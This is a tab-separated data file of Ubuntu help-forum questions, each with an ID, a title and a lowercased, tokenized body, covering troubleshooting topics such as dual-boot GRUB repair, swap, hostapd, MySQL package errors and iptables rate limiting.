427825	mouse wheel wo n't scroll 100 % of the time in file system	i 'm running xfce desktop environment , with the default window manager and am using nemo file manager . i love everything about this setup , except one thing : i ca n't scroll through my files like i want to . when i 'm focused on either the left panel where all my drives are listed , or focused on the files , when i move my mouse wheel : nothing . this is remedied by moving it off to the side until that 'virtual scroll nub ' appears , then mouse wheel works perfectly . in every other setting and application that i can think of , it scrolls properly . also , this is a logitech usb mouse . i would like to do two things : make my mouse wheel scroll all the time a window in my file system has focus this one is optional , but kinda nice : make a fat scroll bar off to the side that is always there , and not just popping up when i move to the side . it also exhibits this behavior in pdfs with the default pdf viewer , the 'document viewer'
427830	enable ubuntu with uefi	warning : complete noob here . okay , so i bought a laptop ( dell ) with windows 8 preinstalled . now it 's on 8.1 and after a lot of reading , i have installed ubuntu 13.10 by 1 ) creating a live usb , 2 ) disabling secureboot and enabling legacy mode . the installation went fine and i ran boot-repair with the recommended mode . now here is my problem . with uefi and secureboot on , it automatically loads windows 8 . when i disable these , i get ubuntu . i 'm loving ubuntu ( it 's faster than windows 8 ) but i ca n't get rid of windows 8 due to work related stuff . i want to have the option of having both oss to select from when i turn on the laptop .
427831	how to restore ubuntu broken partition after windows 7 install	i previously had a windows 7 partition and a ubuntu partition . when i formatted and reinstalled windows 7 , somehow the ubuntu partition got corrupted . i ca n't open it and recover my files even with the ubuntu live cd . i ca n't fix grub because it does n't find the ubuntu partition either . i 'm 100 % sure i did n't delete the ubuntu partition when i installed windows 7 , i know it 's there but it 's corrupted . is there any way i can recover it , or at least recover the files ? this is sudo fdisk -l : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x86bf6871 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 419637247 209715200 7 hpfs/ntfs/exfat /dev/sda3 419639294 625141759 102751233 5 extended /dev/sda5 616697856 625141759 4221952 82 linux swap / solaris thanks in advance !
427832	ubuntu 13.10 first install new user	probably been answered but can not find it . just installed for the first time today with no previous experience . on trying to update get message authentication fails . my ubuntu one account can be accessed with the password . not clear what the problem is or what steps i have missed . thanks
427836	automount thumb drive own by root	i am able to automount my thumb drive on ubuntu 12.04.4 server as ordinary user ( non-root ) . however after mounting the owner was root . drwxr-xr-x 4 root root 2048 jan 1 1970 pp how can change the ownership ? the automout file auto.usb was as below . # # this is an automounter map and it has the following format # key [ -mount-options-separated-by-comma ] location # details may be found in the autofs ( 5 ) manpage # cd -fstype=iso9660 , ro , nosuid , nodev : /dev/cdrom # the following entries are samples to pique your imagination # linux -ro , soft , intr ftp.example.org : /pub/linux # boot -fstype=ext2 : /dev/hda1 # floppy -fstype=auto : /dev/fd0 # floppy -fstype=ext2 : /dev/fd0 # e2floppy -fstype=ext2 : /dev/fd0 # jaz -fstype=ext2 : /dev/sdc1 # removable -fstype=ext2 : /dev/hdda p -fstype=vfat : /dev/sdi1 please help thanks
427838	usb bluetooth went from fine on plug in to not recognized 13.10	today i purchased a usb bluetooth adapter so i could pair a ps3 sixaxis controller to my ubuntu set up . i expected to have to go through some trial and error to get the usb to work properly as it was n't listed as a bluetooth adapter with any official support ( it 's a targus 4.0 dual-mode micro usb adapter ) . to my surprised it worked perfectly fine upon plugging it . everything seemed to work as intended any way - as the bluetooth icon was present in the upper right of the screen and it could be controlled normally through system settings . i even got it to recognize the controller without to much of a hassle and was calibrating it for game use . the problem is i turned off my computer since then , and on re-boot the bluetooth has been unresponsive . the indicator light on the actual usb device is on so i know it 's getting power yet the icon on the top bar is gone and the system settings are unresponsive . it looks like my computer just stopped recognizing the device but i ca n't see why . i 've tried rebooting my pc with the adapter unplugged and putting it back in once the system is up and running and i 've tried booting my pc with the adapter in different usb slots in case one was faulty . i 've also attempted to switch the software running the device from gnome-bluetooth to bluez but there was no change . i 'm running ubuntu 13.10 and while i 'm not a particularly new user i 'm not particularly knowledgeable with code . i tend to just stumble through the forums following the tutorials and suggestions that i can till i either solve my problem or break my os to the point where i have to do a fresh install so if anyone does have any advice for me i 'd appreciate it being as dumbed down as possible .
427840	financial support for ubuntu edge	how can i provide financial support for `` ubuntu edge '' ? give me a link please .
427841	i need to `` swapon '' after each boot	i just clean-installed ubuntu ( 12.04.4 lts ) for my first time about a week ago and have been having problems with swap from the get-go . initially , i was receiving the error message `` the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present '' during boot . in gparted , i could see my hard drive as well as a bunch of empty space that was supposed to be my swap . after mucking about on the internet and such , i tried the answer to this person 's question , which is really just a summary of this post . i went through the steps and had to re-do them a bit because there were some missing steps in the comments , but i at least got the error message to go away ( hooray ) although i still face the problem in the title . at every boot i need to `` swapon '' the swap partition in gparted ( i 'm sure there 's another way , but it 's all i know for now ) . what do ? i 'll post the outputs of any commands you want as long as you show me how to paste the results here properly : d
427842	permanently delete the feature `` save session '' xubuntu 13.10	i 'm running xubuntu 13.10 with xfce4-panel 4.10.1 and my sessions keeps getting saved involuntarily . i 'm well aware that this is a bug so i 'd like to ask if anyone knows a workaround to permanently disable/delete this feature ( by removing/editing some files maybe ) ? i 've spent hours searching and tried a lot of the methods already but none of them worked , or at least were not permanent . some of the stuff i 've tried : how can i turn off xfce session saving system-wide ? ( this basically just removed the tick-box in the logout prompt ) xubuntu reopens last session applications even though it shouldn't ( deleting the cached sessions was not a permanent solution ) i would greatly appreciate your help ! my temorarily solution : i created a simple bash script and placed an application launcher ( which runs the script when pressed ) on my task panel . the script will delete the `` ~/.cache/sessions '' directory and promt log out . the script can be found here : http : //pastebin.com/aqx483pn basically this will be the button which you use to logout/reboot/shutdown . update : this only occurs if you added `` restart '' to the listing , in your `` action button '' ( the button with your username written on ) . if you restart using log out - > restart it should reboot normally and not save your session . thus , the temporarily solution above is not necessary , i will leave it there as a reference .
427844	how to set monaco font in gnome terminal ?	i am using ubuntu 12.04 lts . i installed the monaco font from here . the font is visible in font manager . i can also set the font in gvim . however , if i try to set this font in gnome terminal , that is not possible . it is not listed in edit > profile preferences > font .
427845	a more complex iptables set of rules	i want to make a script that sees if a number of connection attempts are made from one or more ips ( $ ct_multiple_ip_threshold ) in an ammount of time ( $ ct_time ) . if this happens , than in that ammount of time ( $ ct_time ) , search through all ips and ban those that exceed the maximum number of allowed trials for one ip ( $ ct_single_ip_threshold ) . i have found the recent module which semms to be able to achieve this . iptables -a input -m recent -- name port_multiple_scan -- rcheck -- hitcount $ ct_single_ip_threshold -- seconds $ ct_time -j drop q1 : how can i do the threshold for multiple ips ( the hitcount can be used only with -- rcheck or -- update ) ? q2 : can i do a ban ip ( let 's say in hosts.deny ) instead of -j drop ? q3 : is there a betterm module ( instead of recent ) to use and how ?
427849	boot repair does n't fix my grub boot after i repaired windows	my system used to boot to ubuntu 13.04 by default , preceded by the grub . i recently had a problem with windows 8 ( and do , pretty often , with windows hanging at startup and refusing to shut down properly ) , so i had to run an automatic repair on windows , which reconfigured the default boot to windows . i , however find it easier to work with the ubuntu grub as it gives me all boot options . so , i booted to ubuntu again and ran boot repair ( this usually works ) , but was surprised to find that the system was still booting to windows as a default . i eventually discovered that the boot manager contained two images of ubuntu ( after the first boot repair ) . i was careless ( and lazy ) enough not to have noted down the pastebin link created after the first boot repair , but i ran the boot repair again , only to find that it did n't work at all . i , however , copied the pastebin link this time round ( if it 's of any consequence ) : http : //paste.ubuntu.com/7014774/ . boot info shows no boot loader in the mbr . what can be done to remove the duplicate image and reconfigure grub as default ? any links ?
427851	how to close viber in ubuntu 12.04 lts	i am an ubuntu 12.04 lts user , so does anyone know , how to disable the viber icon and/or disable the program , after launch ? i have installed the windows version trough wine , because i am a 32 bit system user . greetings dobri
427853	maintaining files on a fresh install	is there a way of maintaining files from ubuntu 12.04 to a fresh install of the same version without doubling up on information and keeping the same programs etc . thanks guys . p.s i am aware of ubuntu one , however i have more files than the limit and do not wish to pay for more : )
427856	any potential issues if i remove qmail accounts ?	i have been using 13.10 only but after two weeks ago needed to install 12.04 to . with the default guest account i am getting other bunch of accounts as you can see : i have used to disable guest account when installing 13.10 but have no idea what are these alias and qmail accounts for ? other issue is that each time i try to update my 12.04 from the update manager or with sudo apt-get install i am getting errors like this : the hostname -f command returned : $ 1 your system needs to have a fully qualified domain name ( fqdn ) in order to install the var-qmail packages . installation aborted . dpkg : error processing qmail ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of qmail-run : qmail-run depends on qmail ( > = 1.06-2.1 ) ; however : package qmail is not configured yet . dpkg : error processing qmail-run ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : qmail qmail-run e : sub-process /usr/bin/dpkg returned an error code ( 1 ) could you advice if it will be ok to disable these accounts and maybe try to delete this qmail stuff ?
427858	partition installation of ubuntu 13.10	hello i have installed ubuntu 13.10 in partition windows ubuntu : 82 gb windows : 220 gb i want to remove windows 7 partition from my computer and want to give all its space to ubuntu . any way to give that space to ubuntu without reinstalling ubuntu on pc .
427860	uploading ubuntu 13:10	i have downloaded ubuntu 13.10desktop 1386 onto a store and go flash drive . i want to load the ubuntu program onto a new computer with no other programs loaded except intel.i keep getting a sign '' boot failure '' is there other software i need to install first ? please what else do i need to get the program to work .
427861	can i open a new terminal with a new binary executing in it ?	i tried to write a script that opens a new xterminal with some binary file ( not command ) running in it.the whole script looks like this : # ! /bin/bash xterm= '' /usr/bin/xterm -bg white -e /home/ambuj/practice/mybinary '' exec $ xterm 2 > & 1 & the script terminates without doing anything . i 'm using ubuntu 12.04 lts .
427868	how to check if a restart of open-iscsi was ok	i am working on a bash script to connect a iscsi initiator to a target . after i have edited the iscsid.conf in the initiator i have to restart the open-iscsi with the command : service open-iscsi restart is it a possible way to check if the restart was ok , if it was it will try to connect to target with : iscsiadm -m discovery -t st -p 10.05.02.10
427870	permission warnings root folder	yesterday i noticed a warning my terminal window showed when i installed samba . the warning was : warn : /etc/default/ufw is group writable ! warn : /etc/default is group writable ! warn : /etc is group writable ! warn : / is group writable ! warn : /lib/ufw/user.rules is group writable ! warn : /lib/ufw is group writable ! warn : /lib is group writable ! warn : /etc/ufw/applications.d is group writable ! warn : /etc/ufw is group writable ! warn : /etc/ufw/after6.rules is group writable ! warn : /lib/ufw/ufw-init is group writable ! warn : /etc/ufw/ufw.conf is group writable ! warn : /lib/ufw/user6.rules is group writable ! warn : /etc/ufw/before6.rules is group writable ! warn : /etc/ufw/after.rules is group writable ! warn : /etc/ufw/before.rules is group writable ! warn : /usr/sbin/ufw is group writable ! warn : /usr/sbin is group writable ! warn : /usr is group writable ! i do n't know how long this problem has been around ( although i do n't think it has been more than a few weeks at most ) , since i do n't use the terminal very often . and i do n't know what caused the shift in permissions . ls -l / output : total 96 drwxrwxr-x 2 root root 4096 feb 28 20:00 bin drwxrwxr-x 4 root root 4096 feb 19 21:44 boot drwxrwxr-x 2 root root 4096 jun 22 2013 cdrom drwxr-xr-x 14 root root 4440 mar 1 11:11 dev drwxrwxr-x 158 root root 12288 mar 1 11:12 etc drwxrwxr-x 3 root root 4096 mar 1 00:42 home lrwxrwxrwx 1 root root 33 feb 19 21:43 initrd.img - > /boot/initrd.img-3.5.0-46-generic lrwxrwxrwx 1 root root 33 jan 3 10:55 initrd.img.old - > /boot/initrd.img-3.5.0-45-generic drwxrwxr-x 27 root root 4096 feb 8 12:01 lib drwxr-xr-x 2 root root 4096 feb 8 11:58 lib32 drwxrwxr-x 2 root root 4096 oct 22 09:08 lib64 drwxrwxr-x 2 root root 16384 jun 22 2013 lost+found drwxrwxr-x 14 root root 4096 mar 1 11:12 media drwxrwxr-x 2 root root 4096 apr 19 2012 mnt drwxrwxr-x 4 root root 4096 sep 9 07:29 opt dr-xr-xr-x 209 root root 0 mar 1 2014 proc drwxrwxr-x 16 root root 4096 feb 8 11:55 root drwxr-xr-x 22 root root 780 mar 1 11:12 run drwxrwxr-x 2 root root 4096 mar 1 00:18 sbin drwxrwxr-x 2 root root 4096 mar 5 2012 selinux drwxrwxr-x 3 root root 4096 feb 28 19:24 srv dr-xr-xr-x 13 root root 0 mar 1 2014 sys drwxrwxrwt 17 root root 4096 mar 1 11:15 tmp drwxrwxr-x 11 root root 4096 feb 20 21:20 usr drwxrwxr-x 13 root root 4096 mar 1 01:02 var lrwxrwxrwx 1 root root 29 feb 19 21:43 vmlinuz - > boot/vmlinuz-3.5.0-46-generic lrwxrwxrwx 1 root root 29 jan 3 10:55 vmlinuz.old - > boot/vmlinuz-3.5.0-45-generic my question is , what are normal values for permissions in these folders ? would it solve the problem if i removed the group write permissions through the chmod command ? and are there any other things i should look out for ? thanks !
427872	how to use fingerprint reader and card reader on my laptop running on ubuntu 13.10 ?	i have dell vostro 3560 , which was originally shipped with ubuntu , but then i moved to windows 8 and then i moved to ubuntu 13.10 but i am unable to use fingerprint reader of my laptop to login . i searched on internet and installed fprint but when i run it it shows no device found . and i am also unable to use card reader on my laptop . so please help me . result of lsusb is bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0c45:648b microdia integrated webcam bus 001 device 004 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 003 : id 138a:0011 validity sensors , inc. vfs5011 fingerprint reader bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
427874	native tool to change aspect ratio information in video file	i have a video file ( avi ) which somehow has the wrong default aspect ratio . if i open it with vlc or any other player , it 's shown in 4:3 , making everything look really tall/thin . when i manually change the aspect ratio to 16:9 it looks fine , but it 's a bit annoying to do that . i searched for a way to fix this without reencoding the video , but i only found a windows program ( mpeg4 modifier ) and some really old really unhelpful linux forum discussions . maybe i 'm just overlooking something very obvious . is there some native linux/ubuntu tool that can do this ? i usually do n't do much with my video files , so consider me a newby . i 'm running the 12.04 lts version of kubuntu .
427878	force nautilus to ignore extensions	we all know ( or will know one day ) that ubuntu ( or gnu/linux in general ) does not work with extensions of file to recognize what kind of file it is.rather it uses magic numbers . a magic number is a number associate with every linux file and is generally the first few bytes of the file , which identifies the file type . it is used by the linux command line utility file which displays the information related to a file . so when we check a file type with the file command , it gives appropriate file type regardless of it 's extensions . so a mp3 file gives aditya @ aditya-desktop : ~/music $ file 'music.mp3' music.mp3 : audio file with id3 version 2.3.0 , contains : mpeg adts , layer iii , v1 , 64 kbps , 44.1 khz , jntstereo aditya @ aditya-desktop : ~/music $ file 'music' music : audio file with id3 version 2.3.0 , contains : mpeg adts , layer iii , v1 , 64 kbps , 44.1 khz , jntstereo aditya @ aditya-desktop : ~/music $ file 'music.txt' music.txt : audio file with id3 version 2.3.0 , contains : mpeg adts , layer iii , v1 , 64 kbps , 44.1 khz , jntstereo aditya @ aditya-desktop : ~/music $ the same expt , when tried with nautilus , it considers the file a music file when it has .mp3 or no extension , but when it is given .txt extension , it considers it a text file . so the main question , does nautilus use extensions to recognize file ? how can i force nautilus to ignore extensions and use magic numbers ?
427884	libpython2.6.so.1.0 does n't exist	i am trying to run an application called powerpc-eabi-gdb , however , when i start it , i get the following error : error while loading shared libraries : libpython2.6.so.1.0 : can not open shared object file : no such file or directory i tried to install python2.6 . apt-get told me to install python-gdbm instead . i tried to install it and it seemed to be installed already . what should i do now ?
427887	ca n't find /usr/lib/wireshark folder in ( k ) ubunutu 13.10	i need to install a wireshark plug-in and the tutorial says to put it into /usr/lib/wireshark/libwiresharkx/plugins in ubuntu 12.10 i successfully find this directory , how come i ca n't find it anymore in ubuntu 13.10 ? wireshark version has changed to 1.10.2 in ubuntu 13.10..maybe it changed the plug-in directory too ? this is the output of sudo dpkg -l wireshark / . /usr /usr/share /usr/share/applications /usr/share/applications/wireshark.desktop /usr/share/man /usr/share/man/man1 /usr/share/man/man1/wireshark.1.gz /usr/share/doc /usr/share/doc/wireshark /usr/share/doc/wireshark/copyright /usr/share/pixmaps /usr/share/pixmaps/wsicon32.xpm /usr/share/icons /usr/share/icons/hicolor /usr/share/icons/hicolor/scalable /usr/share/icons/hicolor/scalable/apps /usr/share/icons/hicolor/scalable/apps/wireshark.svg /usr/share/icons/hicolor/48x48 /usr/share/icons/hicolor/48x48/apps /usr/share/icons/hicolor/48x48/apps/wireshark.png /usr/share/menu /usr/share/menu/wireshark /usr/bin /usr/bin/wireshark /usr/share/doc/wireshark/readme.debian /usr/share/doc/wireshark/changelog.debian.gz
427893	formatting only windows partition and leaving ubuntu untouched	i am using a dual boot system with ubuntu 13.10 and windows8 . i have a 64 bit hp pavilion g6 but when i last installed my win8 i installed a 32 bit os , and then i installed my ubuntu over my win8 . now my workload on the win8 workspace has slowly increased and the 32 bit os operation is becoming a problem , plus the hardware reserved ram for the 32 bit os renders most of my ram unusable . so i want to format only my windows partition and reinstall a 64 bit os over there . is it possible ? if yes , how do i do it ? ?
427894	no windows 7 on grub menu 13.10	i do n't know much about linux , then i tried it . i liked , i installed from cd . there were three partitions , 200 gb win7 , 750gb storage area , and about 30gb free space for ubuntu . i divided 30 gb area 27 and 3 gb parts , made 3gb swap , and installed ubuntu on the bigger part . setup finished without any problems . when i rebooted my pc , it didnt ask for a selection and booted windows 7 . i struggled for a hour , and tried boot-repair . now , grub menu appears , but there is no windows selection , only ubuntu . this is my log , http : //paste.ubuntu.com/7015467/ i appreciate for any help , thanks .
427898	what should i learn before i dive into ubuntu-touch porting and development ?	the documentation is a bit over my head . while i can understand the syntax for the most part , i have a hard time comprehending why specific parts , such as cyanogen mod , are important to the project , or whether they are permanent mainstays to the project . i feel like i would benefit from more basic documentation before i dive in , but i do not know where to start , and what documentation is good to know long term . i am thinking that i should just hop into kernel development , but i would like to hear what others think . my goal here is to become a long term linux and ubuntu developer , familiar with its low level aspects . thanks !
427899	remounting read-only gpt filesystem as writable	i 'm trying to read from a rescued macbook harddrive - here 's the info from fdisk -l : disk /dev/sdc : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 488397167 244198583+ ee gpt i can read the data from it fine , but trying to write ( copying files , etc ) throws a permission denied error . changing the permissions also gives an error : error setting permissions : read-only file system . i tried the solution to this question : $ sudo mount -o remount , rw '/dev/sdc1' mount : ca n't find /dev/sdc1 in /etc/fstab or /etc/mtab
427903	hostapd does not create a wifi network	i 'm trying to setup a wireless ap to share a wired internet connection over wi-fi . it 's a newly built pc , and at first i thought that the wireless card might be defective , however everything works correctly trying connectify under windows . i chose a wireless card just for this scope hoping that it would n't give me problems ( ath9k driver ) , but i ca n't figure out what i 'm doing wrong . the card is a tp-link tl-wn781nd , with ar9285 atheros chipset . even the simplest configuration of hostapd with this .conf file interface=wlan0 driver=nl80211 ssid=test channel=1 hw_mode=g country_code=it ( same behaviour even without country_code ) and launching it with sudo hostapd /location/to/hostapd.conf seems to run successfully , however it wo n't generate any network . i 'm scanning for wi-fi networks on 3 different devices ( android tablet , ios phone , ubuntu laptop ) and the network does n't show up in any of them . the only warning/error that it gives me is this : $ sudo hostapd hostapd.conf configuration file : hostapd.conf failed to update rate sets in kernel module # < -- this one using interface wlan0 with hwaddr 64:66 : b3 : fa : df:1a and ssid 'test' i 'll paste here the output of launching it with -dd option : random : trying to read entropy from /dev/random configuration file : hostapd.conf nl80211 : interface wlan0 in phy phy0 rfkill : initial event : idx=0 type=2 op=0 soft=0 hard=0 rfkill : initial event : idx=1 type=1 op=0 soft=0 hard=0 nl80211 : using driver-based off-channel tx nl80211 : use separate p2p group interface ( driver advertised support ) nl80211 : tdls supported nl80211 : tdls external setup nl80211 : register frame command failed ( type=208 ) : ret=-114 ( operation already in progress ) nl80211 : register frame match - hexdump ( len=2 ) : 04 0a nl80211 : failed to register action frame processing - ignore for now nl80211 : add own interface ifindex 3 nl80211 : set mode ifindex 3 iftype 3 ( ap ) nl80211 : create interface iftype 6 ( monitor ) nl80211 : new interface mon.wlan0 created : ifindex=11 nl80211 : add own interface ifindex 11 bss count 1 , bssid mask 00:00:00:00:00:00 ( 0 bits ) nl80211 : regulatory information - country=it nl80211 : 2402-2482 @ 40 mhz nl80211 : 5170-5250 @ 40 mhz nl80211 : 5250-5330 @ 40 mhz nl80211 : 5490-5710 @ 40 mhz nl80211 : 57240-65880 @ 2160 mhz nl80211 : added 802.11b mode based on 802.11g information allowed channel : mode=1 chan=1 freq=2412 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=2 freq=2417 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=3 freq=2422 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=4 freq=2427 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=5 freq=2432 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=6 freq=2437 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=7 freq=2442 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=8 freq=2447 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=9 freq=2452 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=10 freq=2457 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=11 freq=2462 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=12 freq=2467 mhz max_tx_power=20 dbm allowed channel : mode=1 chan=13 freq=2472 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=1 freq=2412 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=2 freq=2417 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=3 freq=2422 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=4 freq=2427 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=5 freq=2432 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=6 freq=2437 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=7 freq=2442 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=8 freq=2447 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=9 freq=2452 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=10 freq=2457 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=11 freq=2462 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=12 freq=2467 mhz max_tx_power=20 dbm allowed channel : mode=0 chan=13 freq=2472 mhz max_tx_power=20 dbm completing interface initialization mode : ieee 802.11g channel : 1 frequency : 2412 mhz nl80211 : set freq 2412 ( ht_enabled=0 sec_channel_offset=0 ) failed to update rate sets in kernel module rate [ 0 ] rate=10 flags=0x1 rate [ 1 ] rate=20 flags=0x1 rate [ 2 ] rate=55 flags=0x1 rate [ 3 ] rate=110 flags=0x1 rate [ 4 ] rate=60 flags=0x0 rate [ 5 ] rate=90 flags=0x0 rate [ 6 ] rate=120 flags=0x0 rate [ 7 ] rate=180 flags=0x0 rate [ 8 ] rate=240 flags=0x0 rate [ 9 ] rate=360 flags=0x0 rate [ 10 ] rate=480 flags=0x0 rate [ 11 ] rate=540 flags=0x0 flushing old station entries deauthenticate all stations wpa_driver_nl80211_set_key : ifindex=3 alg=0 addr= ( nil ) key_idx=0 set_tx=0 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=3 alg=0 addr= ( nil ) key_idx=1 set_tx=0 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=3 alg=0 addr= ( nil ) key_idx=2 set_tx=0 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=3 alg=0 addr= ( nil ) key_idx=3 set_tx=0 seq_len=0 key_len=0 using interface wlan0 with hwaddr 64:66 : b3 : fa : df:1a and ssid 'test' vlan : vlan_set_name_type ( name_type=2 ) nl80211 : set beacon ( beacon_set=0 ) wpa_driver_nl80211_set_operstate : operstate 0- > 1 ( up ) netlink : operstate : linkmode=-1 , operstate=6 wlan0 : setup of interface done . random : got 20/20 bytes from /dev/random rtm_newlink : operst to me everything seems to execute correctly except for that failed to update rate sets in kernel module , even if i have to say that i saw someone who had hostapd working even with this message . can anyone help me or point me to the right direction ? thank you very much
427907	deleting firefox 's suggestions in the address bar	i 'm using firefox in xubuntu . i deleted my history on firefox , however , whenever i write something in the search bar , i still see my history there . how should i completely delete my history ? ( i already tried using bleachbit , but it did n't help ) . edit : guys , i obviously tried to delete my history by going to ctrl+shift+del and deleting everything . as i said `` i deleted my history on firefox '' .. that 's not working . i mean , it does delete the history , but it does n't delete the suggestions in the address bar .
427908	ubuntu 12.04.04 lts installation does n't work	i have been using ubuntu on my laptop for a while now . i tried to install ubuntu on my desktop ( 64bit ) with a cd , my ubuntu install cd starts and i can use it . when i arrive at the screen `` installation type the computer currently has windows 7 on it . what do you like to do ? `` , it says . install ubuntu inside windows 7 ( what is strange because it was alongside in the versions before. ) replace windows 7 with ubuntu something else so i want to install ubuntu next windows 7 , when i click install ubuntu inside windows 7 it closes ubuntu and comes to the screen `` please remove the disk , close the tray ( if any ) . my computer restarts and opens windows 7 . the disk auto starts wubi on the computer . i come on a window that display 's some text like this : i click on demo and full installation . after this window it says that i need to restart my computer . i restarted and i come in the beginning of the process again ( so back to step 1 ) it keeps doing this in a loop . this is a repost of a closed-off post you can find it here
427909	ubuntu server 12.04 stops responding soon after assigning a static ip manually	i know there 's a lot written about this issue but no response seem to answer my question . so i am wondering my problem is with the most recent version of ubuntu . i have just installed an ubuntu 12.04 server ( 64bit ) - precise , on my home pc using virtualbox v4.3.6 by bridging the network adapter . everything works fine as i can run apt-get update and see the outside world , name resolution resolves perfectly too ( i.e : nslookup google.com ) my problem is when i edit the interfaces file and enter a static address identical to the dhcp address issued by my router , and restart the server or the network , i can no longer access my local network , in other words i can not even ping my gateway . if i enter the same ip address manually , for example ifconfig eth0 192.168.0.15 , i can then ping my gateway but i can not see the outside world . i have purged my network manager , wondering if that is the cause . when i installed the server at work i can work around this by reserving the ip address , but i am hoping to get a better understanding of the problem . any advise on this. ? thanks for your replies , this is my interface file with static assigned auto lo iface lo inet loopback the primary network interface auto eth0 iface eth0 inet dhcp iface eth0 inet static address 192.168.0.15 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 thanks but . adding nameserver to the interface file did n't help . when i switched back to dhcp everything works fine , i can ping internet addresses by ip and by name .
427916	latex compilation problem	i have installed latex and compiled tex file using pdflatex command , the file did not compile . it is showing revtex4-1.cls not found . how to fix this , please any one can help me .
427922	disable network permanently	i want to install an ubuntu system to an usb stick and if i boot this , i do n't want it to connect to the internet . is there a way to archieve this ? i tried sudo ifconfig eth2 down but it is up again at the next restaret
427925	launch keyboard config gui from terminal	i am running ubuntu 12.04 with the lxde desktop . i would like to launch the standard keyboard configuration gui tool but cant seem to find it in my menus . can anybody let me know whats the name of the command i should input in command line ? thanks !
427926	unable to install mysql . held broken packages	i tried installing mysql using sudo apt-get install mysql-server , and i get an error saying some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mysql-server : depends : mysql-server-5.1 but it is not going to be installed e : unable to correct problems , you have held broken packages . when i type sudo apt-get install mysql-server-5.1 , it says : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mysql-server-5.1 : depends : mysql-client-5.1 ( > = 5.1.69-0ubuntu0.11.10.1 ) but it is not going to be installed depends : libdbi-perl but it is not going to be installed e : unable to correct problems , you have held broken packages . '' and when i type mysql , it says , error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) i tried sudo apt-get remove -- purge mysql-client-5.1 but it says that mysql-client is not installed so it ca n't be uninstalled . what should i do ?
427937	how to view multiple files in single terminal ?	sometimes i may need to access multiple log files for troubleshooting , but i do n't want to open them in different terminals . what i want is to open them in same terminal . is there any way i can view tail part of the multiple log files in a same terminal window ?
427938	how to restore a clonezilla image	i have bought a new pc with windows 8 installed on it . i have restored the image i crated with clonezilla of my ubuntu 13.10 system frm my old computer . when i restarted the computer i have n't the grub menu like in my old computer .
427940	mouse keys autoclick	i am trying to use mouse keys to repeatedly click something . when i enable mouse keys via the system settings , pressing 5 makes the mouse click ; however , holding 5 does not make the mouse click multiple times . i would like to make it so that holding 5 makes the mouse click multiple times in the same way that holding any other key on the keyboard makes it input that character multiple times . what is the easiest way to do this ?
427941	ca n't change keyboard layout in cinnamon 2.0.6 installed on ubuntu 13.10	i recently installed ubuntu 13.10 , and there was bug that you could n't change your keyboard layout via `` shift+alt '' , i updated it and there was fix for this bug . when i installed cinnamon 2.0.6 and logged in it , again there was this bug.but when i was in unity there was n't any problem . i tried to fix this via `` configuration editor '' , said in some articles but with no luck .
427943	ca n't launch ubuntu	i have two operating systems , windows 7 and ubuntu 12.10. ubuntu is on a different partition it suddenly crashed and wo n't open . what may be the reasons for the sudden crash ? and how can i get the data on it ?
